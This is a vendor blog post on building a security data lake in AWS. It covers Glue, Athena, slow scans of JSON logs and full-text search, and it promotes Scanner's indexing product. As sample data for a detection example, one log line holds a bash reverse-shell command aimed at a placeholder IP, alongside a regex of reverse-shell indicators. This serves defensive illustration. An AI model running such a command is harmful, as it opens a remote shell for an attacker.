November 17, 2025

How to Build a Security Data Lake: ETL and search queries with high performance and low overhead (Part 2)

In the first part of this blog series, we discussed why security data lakes are on the rise as a way to overcome SIEM log storage limits and skyrocketing costs, surveyed the various options and tools available, and covered the first challenge: ingesting all your logs.

Once all of your log sources are connected, the next challenge is to make the data queryable with high performance and to run detections on top of it. This is where things get really interesting (and often painful) for most organizations.

Making Logs Queryable: The ETL Bottleneck

Once logs are in your data lake, the real challenge begins: turning raw JSON files into something searchable and usable. This is often the most difficult leg of the journey. What you initially have is a messy data swamp. How do you turn this into a usable data lake?  

Most of the customers we work with are building their data lakes in AWS, so for the purposes of this blog we will focus on AWS as the starting point.

Typically, you might first use an ETL tool like AWS Glue to crawl your S3 buckets, infer schemas, and create tables in a data catalog. Glue determines the structure of your S3 key paths and maps them to SQL table schema fields, which addresses the cataloging problem.
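
To make this concrete, here is a minimal sketch of what defining such a crawler looks like with boto3. The bucket, IAM role, and database names are all hypothetical placeholders; substitute your own (and note this is an illustration, not a production-ready configuration).

```python
def crawler_config(bucket: str, prefix: str, role_arn: str, database: str) -> dict:
    """Build an AWS Glue crawler definition for a given S3 log prefix."""
    return {
        "Name": f"{database}-{prefix.strip('/').replace('/', '-')}-crawler",
        "Role": role_arn,
        "DatabaseName": database,
        "Targets": {"S3Targets": [{"Path": f"s3://{bucket}/{prefix}"}]},
        # Run daily at 02:00 UTC so new date partitions are picked up.
        "Schedule": "cron(0 2 * * ? *)",
        "SchemaChangePolicy": {
            # Evolve the table schema as vendors change their log output.
            "UpdateBehavior": "UPDATE_IN_DATABASE",
            "DeleteBehavior": "LOG",
        },
    }

config = crawler_config(
    bucket="my-security-logs",           # hypothetical bucket
    prefix="cloudtrail/",
    role_arn="arn:aws:iam::123456789012:role/GlueCrawlerRole",  # hypothetical role
    database="security_lake",
)

# With AWS credentials configured, you would then register and run it:
# import boto3
# glue = boto3.client("glue")
# glue.create_crawler(**config)
# glue.start_crawler(Name=config["Name"])
```

Once the crawler has run, the inferred tables appear in the Glue Data Catalog and become queryable from Athena.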

Amazon Athena is then often used to query the cataloged data. When you write a SQL query, Athena uses the logical table schema (as inferred by AWS Glue) to determine which S3 key paths to filter and scan, and then executes the query by scanning through those objects.
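
A sketch of what running such a query against the catalog looks like programmatically. The database, table, and results bucket names are hypothetical; Athena writes its result files to S3, and you poll for completion before reading them.

```python
def athena_query_params(sql: str, database: str, results_bucket: str) -> dict:
    """Parameters for athena.start_query_execution()."""
    return {
        "QueryString": sql,
        "QueryExecutionContext": {"Database": database},
        # Athena writes result files here; you poll get_query_execution()
        # until the state is SUCCEEDED, then fetch the results.
        "ResultConfiguration": {
            "OutputLocation": f"s3://{results_bucket}/athena-results/"
        },
    }

params = athena_query_params(
    sql=(
        "SELECT sourceipaddress, count(*) AS events "
        "FROM cloudtrail_logs "            # hypothetical table from the Glue catalog
        "GROUP BY sourceipaddress ORDER BY events DESC LIMIT 10"
    ),
    database="security_lake",
    results_bucket="my-athena-results",    # hypothetical bucket
)

# With AWS credentials configured:
# import boto3
# athena = boto3.client("athena")
# execution_id = athena.start_query_execution(**params)["QueryExecutionId"]
```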

The challenge of messy security data

The reality is that security data rarely fits neatly into tables. Logs are often deeply nested, semi-structured, or text-heavy - think payloads or request parameters, deeply nested WAF data, and EDR logs containing command-line strings. Additionally, fields are inconsistent and often change over time as vendors modify their log output.

Transforming these logs into tabular formats like Parquet requires complex ETL pipelines - flattening, normalizing, and converting data for compatibility. To ease this process, Amazon created its own Security Lake service and, together with other vendors, the Open Cybersecurity Schema Framework (OCSF), which helps considerably with certain types of data such as network flows.
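
The flattening step at the heart of these pipelines can be sketched in a few lines. This toy function turns nested JSON into dotted column names of the kind a tabular format like Parquet expects; a real pipeline would also have to handle arrays, type coercion, and schema drift.

```python
def flatten(record: dict, parent: str = "", sep: str = ".") -> dict:
    """Recursively flatten nested JSON into a single level of
    dotted column names, e.g. requestParameters.bucketName."""
    flat = {}
    for key, value in record.items():
        column = f"{parent}{sep}{key}" if parent else key
        if isinstance(value, dict):
            flat.update(flatten(value, column, sep))
        else:
            flat[column] = value
    return flat

# A simplified CloudTrail-style event (hypothetical sample data).
event = {
    "eventName": "PutBucketPolicy",
    "requestParameters": {"bucketName": "prod-data", "policy": "{...}"},
    "userIdentity": {"type": "IAMUser", "userName": "alice"},
}
row = flatten(event)
# row now has flat keys like "requestParameters.bucketName",
# ready to be written as columns in a Parquet file.
```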

Query speeds are good when you are searching for column-value pairs; if your SQL queries perform efficiently in such scenarios, that's excellent. OCSF also ensures a consistent schema across all these data sources.

While Amazon Security Lake offers some advantages, it falls short in supporting a wide range of SaaS sources such as Slack, GitHub, Salesforce, or Google Workspace logs directly. Converting these unsupported logs into the OCSF format presents a significant challenge. This can lead to a situation where some data is neatly organized, but a substantial portion remains in formats that are not well-suited for SQL, often being text-heavy, semi-structured, or messy JSON.

AWS services can be used with a data lake, but you might also employ tools like Apache Spark for large-scale ETL jobs to flatten JSON and normalize schemas. Other options include Ray (a Python-based distributed computing framework), pipeline tools like Cribl or dbt, or fully custom pipelines. The core task remains the same: transforming messy JSON and CSV security logs into a structured, tabular format (like Parquet with a SQL schema).

The SQL misfit with security logs

Tabular data that naturally fits a SQL schema, such as network flow logs, works well with the SQL paradigm that is foundational to data lakes. Tools like Athena, Trino, or Apache Spark are typically used in this scenario, assuming your data fits neatly into tables.

However, many security logs are semi-structured by nature. While some fields align well with a SQL schema, others - request parameters, deeply nested WAF data, or EDR logs with extensive text and command-line entries - do not. Yet the traditional method for querying logs in S3 is to force them into SQL schemas using Glue, Athena, or Spark, and this creates a significant operational burden for each new log source. For instance, ingesting a new gzipped JSON log requires configuring AWS Glue crawlers to infer a schema, initiating ETL jobs, and transforming the data into a table.

In our strong opinion, security logs, with all their messy data, are not a good fit for being forced into a SQL schema. This is the first wall security teams hit when constructing a data lake.

The Query Performance Dilemma

The next big challenge is query speed: how quickly can queries execute over large volumes of logs?

When a tool like Amazon Athena executes a query against a gzipped JSON file, it needs to fully decompress the file and then search through it, every single time. This is extremely computationally intensive. Queries often take several minutes to hours to execute, and in some cases they may even time out and return nothing. This becomes a major blocker for security engineering teams as they conduct their investigations.
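
This toy sketch shows why: to answer even a narrow question about a gzipped JSON-lines object, the engine must decompress and parse every record, because there is no index to skip ahead with. (The in-memory blob stands in for an object in S3.)

```python
import gzip
import io
import json

# Build a small gzipped JSON-lines "log file" in memory (hypothetical data).
records = [{"eventName": "GetObject", "ip": f"10.0.0.{i}"} for i in range(1000)]
records[500]["eventName"] = "PutBucketPolicy"   # the one record we care about
blob = gzip.compress("\n".join(json.dumps(r) for r in records).encode())

def scan(blob: bytes, event_name: str) -> list:
    """Full scan: decompress and parse every record to find matches."""
    hits = []
    with gzip.open(io.BytesIO(blob), "rt") as f:
        for line in f:
            rec = json.loads(line)
            if rec["eventName"] == event_name:
                hits.append(rec)
    return hits

matches = scan(blob, "PutBucketPolicy")
```

One matching record out of a thousand still costs a full decompress-and-parse pass; multiply that across terabytes of objects and the latency problem becomes clear.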

To illustrate, consider a common security investigation: searching 6 months of CloudTrail logs for S3 bucket policy changes on production buckets. Using Athena, you must scan all files across 180 days of daily log folders - approximately 10-15 terabytes of raw logs. Athena parses every JSON record, applies filters, and returns results after 30+ minutes of processing, costing $50-75 per query at Athena's typical $5 per terabyte scanned.
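
A query for this investigation might look something like the following sketch. The table and partition column names are hypothetical and would need to match your own Glue catalog; in many CloudTrail-on-Athena setups, requestParameters is stored as a JSON string, hence the json_extract_scalar call.

```python
def bucket_policy_query(table: str, days: int = 180) -> str:
    """Build Athena SQL for the bucket-policy investigation described above.
    Table and partition column names are hypothetical placeholders."""
    return f"""
    SELECT eventtime, useridentity.arn AS actor, requestparameters
    FROM {table}
    WHERE eventname IN ('PutBucketPolicy', 'DeleteBucketPolicy')
      AND json_extract_scalar(requestparameters, '$.bucketName') LIKE 'prod-%'
      -- Only the date partition narrows the scan; every file in the
      -- 180-day range is still opened and parsed.
      AND date_partition >= date_format(date_add('day', -{days}, current_date), '%Y/%m/%d')
    """

sql = bucket_policy_query("cloudtrail_logs")
```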

The primary reason Athena is slow when searching through log data is that partitioning is limited to directory structure. Athena can only prune based on what appears in the file path itself - typically date, account ID, and region. For queries filtering on fields buried in JSON, like requestParameters.bucketName in CloudTrail logs, Athena cannot skip files without opening them. This means queries must still read and parse files across all matching time partitions. When searching a large time range - say, 6 months to a year of logs - this can mean reading terabytes of data to answer a single question. Your partition strategy is thus constrained by file path structure, not by the actual field values you need to query.
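
In other words, the only pruning available is enumerating date-partitioned S3 prefixes, as in this sketch (the bucket path is hypothetical); everything underneath the matching prefixes must still be read.

```python
from datetime import date, timedelta

def prunable_prefixes(base: str, start: date, end: date) -> list:
    """Enumerate date-partitioned S3 prefixes in a range -- the extent
    of Athena's pruning when the filter field lives inside the JSON."""
    prefixes, day = [], start
    while day <= end:
        prefixes.append(f"{base}/{day.year:04d}/{day.month:02d}/{day.day:02d}/")
        day += timedelta(days=1)
    return prefixes

# Six months of daily prefixes. Each may hold gigabytes of gzipped JSON,
# and a filter on requestParameters.bucketName cannot skip any of them.
prefixes = prunable_prefixes(
    "s3://my-security-logs/cloudtrail",   # hypothetical bucket path
    date(2025, 1, 1),
    date(2025, 6, 30),
)
```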

The critical need for full-text search

A major hurdle for security teams adopting data lakes is the inability to perform full-text search on unstructured or "messy" logs. Security engineers are accustomed to this capability in traditional SIEMs but often lose it when moving to a data lake architecture. This is a significant drawback because critical security signals often reside within the noisy, unstructured parts of log data that don't conform to a neat schema.

Without the ability to search within these noisy log sections, it becomes nearly impossible to uncover signals related to threats like reverse shells, command and control traffic, or malicious scripts. Full-text search is essential for investigating:

  • Messy command-line arguments
  • Suspicious user-agent strings
  • Embedded payloads in HTTP requests
  • Unstructured authentication events or script contents

If this full-text search capability is missing, a large volume of critical security data remains effectively invisible within the data lake. Standard SQL query engines used in data lakes make full-text and substring searches so slow and expensive as to be infeasible. When implemented correctly, however, high-performance full-text search provides massive wins and significantly enhances investigation power.
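
The kind of search investigators need is essentially grep over raw, schema-less log lines, as in this sketch. The log lines and indicator patterns are hypothetical samples; real detection content would be far broader.

```python
import re

# Raw, schema-less log lines of the kind SQL engines struggle with.
log_lines = [
    'proc_launch cmdline="bash -i >& /dev/tcp/203.0.113.7/4444 0>&1" user=www-data',
    'GET /index.html 200 ua="Mozilla/5.0"',
    'proc_launch cmdline="python -c \'import socket...\'" user=svc-backup',
]

# A few reverse-shell indicators (illustrative, not a complete ruleset).
indicators = re.compile(r"/dev/tcp/|nc -e|import socket")

# Substring/regex search over the entire line, no schema needed.
hits = [line for line in log_lines if indicators.search(line)]
```

Both process-launch lines are flagged here; a column-oriented SQL engine would first need these command lines extracted into a schema before it could filter on them at all.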

As mentioned earlier, Apple tackled this problem themselves by utilizing S3 and Databricks Delta Lake. This move, which decoupled compute from storage, enabled them to handle petabytes of data ingestion daily. Furthermore, Apple developed custom Apache Lucene plugins for Apache Spark, which allowed for exceptionally high-performance regular expression and token-based searching across multi-petabyte indices. However, most security teams do not want to tackle such a complex data engineering project themselves.

The Cost And Complexity Of Build-Your-Own Data Lakes

As we have seen, many teams will attempt to build their own security data lakes initially, but run into roadblocks around ingestion, ETL, and painful query performance. The end result: 

  • High operational tax for teams maintaining pipelines.
  • Productivity hindered by very slow queries and lack of full-text search. 
  • Costly maintenance as the data lake grows.

The Next Generation of Log Querying

The future belongs to tools that embrace log complexity rather than fight it.

Next-generation search engines are designed to query unstructured or semi-structured data directly, without requiring rigid schemas or heavy transformations. They can index JSON, plaintext, or key-value logs and return results in seconds - enabling real-time investigation and detection across massive datasets.

This is where platforms like Scanner redefine what a security data lake can do.

Built for the messiness of security data

Where other solutions struggle with slow queries or narrow schemas, Scanner excels at speed, flexibility, and simplicity. You can retain all your logs - structured, unstructured, and everything in between - without paying SIEM-level storage or ingestion costs.

Traditional data lakes, even with optimizations like partitioning and columnar formats (e.g., Parquet), often struggle with the complexity of security logs. Scanner takes a fundamentally different approach. It's purpose-built to embrace the messiness of security data, delivering unparalleled search performance and cost efficiency compared to both traditional data lakes and legacy SIEMs.

Scanner achieves its speed by building inverted indexes directly on top of your data lake storage during ingestion. When data is imported, JSON is parsed once, and a lookup table is created that maps field values to the specific files containing them. This index is stored separately, allowing Scanner to identify and scan only the relevant data files during a query. This parallel execution and intelligent indexing mean that instead of scanning entire tables or partitions, Scanner skips irrelevant data, drastically reducing query times from minutes (or even hours) to mere seconds. We have seen customers execute queries up to 700x faster than Amazon Athena, for example.
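
To illustrate the idea, here is a toy inverted index in the spirit of the approach described above: field:value terms map to the files containing them, so a query only touches the files listed for its terms. (Scanner's actual on-disk index format is more sophisticated; this is purely an illustration, and the file names are hypothetical.)

```python
from collections import defaultdict

def build_index(files: dict) -> dict:
    """Map 'field:value' terms to the set of files containing them."""
    index = defaultdict(set)
    for filename, records in files.items():
        for record in records:
            for field, value in record.items():
                index[f"{field}:{value}"].add(filename)
    return index

# Hypothetical data files, parsed once at ingestion time.
files = {
    "logs/2025/01/01.json": [{"eventName": "GetObject", "srcIp": "10.0.0.1"}],
    "logs/2025/01/02.json": [{"eventName": "PutBucketPolicy", "srcIp": "10.0.0.2"}],
}
index = build_index(files)

# At query time, only the files listed for the term are scanned --
# every other file is skipped entirely.
candidates = index["eventName:PutBucketPolicy"]
```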

This architectural difference also translates into significant cost savings. Traditional data lakes incur higher costs due to the extensive data scanning required for complex queries, especially those involving deeply nested JSON or substring searches. Scanner's ability to scan only the necessary data results in a dramatic reduction in query costs, often by orders of magnitude. Furthermore, Scanner indexes semi-structured data like JSON fields at ingestion, eliminating the need for expensive, on-the-fly parsing during queries, a common bottleneck in traditional data lake solutions. This allows for direct and efficient querying of nested fields using simple dot notation.

Another huge bonus: Scanner enables effortless full-text search through all your log data. Search for any text in any field, no schema required. Find IPs, usernames, file paths, or error messages across all your logs with one query.

In essence, Scanner redefines what a security data lake can do. It's not just about storing logs; it's about making years of logs instantly searchable and actionable, at a fraction of the cost of legacy SIEMs, by intelligently indexing and querying data directly within your own S3 buckets.

Next Steps - Detection

So far we have tackled the ingestion, transformation, and query phases of the security data lake journey. In our next part of this blog series, we will cover how to enable detections and monitoring on top of your security data lake. 

We believe that traditional log architectures are broken for modern log volumes. Scanner enables fast search and detections for log data lakes – directly in your S3 buckets. Reduce the total cost of ownership of logs by 80-90%.
Cliff Crosland
CEO, Co-founder
Scanner, Inc.
Cliff is the CEO and co-founder of Scanner.dev, which provides fast search and threat detections for log data in S3. Prior to founding Scanner, he was a Principal Engineer at Cisco where he led the backend infrastructure team for the Webex People Graph. He was also the engineering lead for the data platform team at Accompany before its acquisition by Cisco. He has a love-hate relationship with Rust, but it's mostly love these days.